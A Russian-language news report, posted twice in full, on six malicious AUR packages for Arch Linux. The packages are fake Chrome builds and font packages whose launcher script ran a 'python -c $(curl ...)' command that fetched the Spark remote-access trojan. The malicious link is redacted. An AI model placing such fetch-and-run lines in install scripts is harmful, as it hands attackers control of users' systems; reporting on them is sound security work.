# В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
robot (spnet, 1) → All – 13:44:05 2025-08-04
В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение [ к выявленным две недели ]( https://www.opennet.ru/opennews/art.shtml?num=63604 ) назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также [ содержащий изменение ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) , устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl
вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был [ удалён ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/ ) администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие [ аналогичный сценарий ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) установки вредоносного ПО на систему пользователя.
Следом было выявлено ещё три пакета с вредоносным кодом: [ ttf-mac-fonts-all ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/ ) , [ ttf-ms-fonts-all ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/ ) и gromit.
https://www.linux.org.ru/news/security/18040993
robot (spnet, 1) → All – 13:44:05 2025-08-04
В репозитории AUR (Arch User Repository), были обнаружены пакеты содержащие вредоносный код, интегрированные в пакеты с неофициальными сборками браузеров. В дополнение [ к выявленным две недели ]( https://www.opennet.ru/opennews/art.shtml?num=63604 ) назад трём вредоносным пакетам с браузерами, в AUR был добавлен пакет google-chrome-stable, также [ содержащий изменение ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) , устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда ‘python -c «$(curl
вредоносная ссылка)»’, загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет был загружен позавчера и был [ удалён ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/GHPZL7D6ASQRCDIJBXBYTVAPJKUN3MJV/ ) администраторами AUR через несколько часов после появления. Почти сразу после удаления этого вредоносного пакета в AUR были загружены два вредоносных пакета - «chrome» и «chrome-bin», содержащие [ аналогичный сценарий ]( https://aur.archlinux.org/cgit/aur.git/tree/google-chrome-stable.sh?h=chrome-bin ) установки вредоносного ПО на систему пользователя.
Следом было выявлено ещё три пакета с вредоносным кодом: [ ttf-mac-fonts-all ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/FW7KMQODHEBTIA6QY3VG563KKDLALXGZ/ ) , [ ttf-ms-fonts-all ]( //lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/">https://lists.archlinux.org/archives/list/aur-requests@lists.archlinux.org/thread/N4GYCFBHAAUXT7UFYKRA2EW2OZP6OUJW/ ) и gromit.
https://www.linux.org.ru/news/security/18040993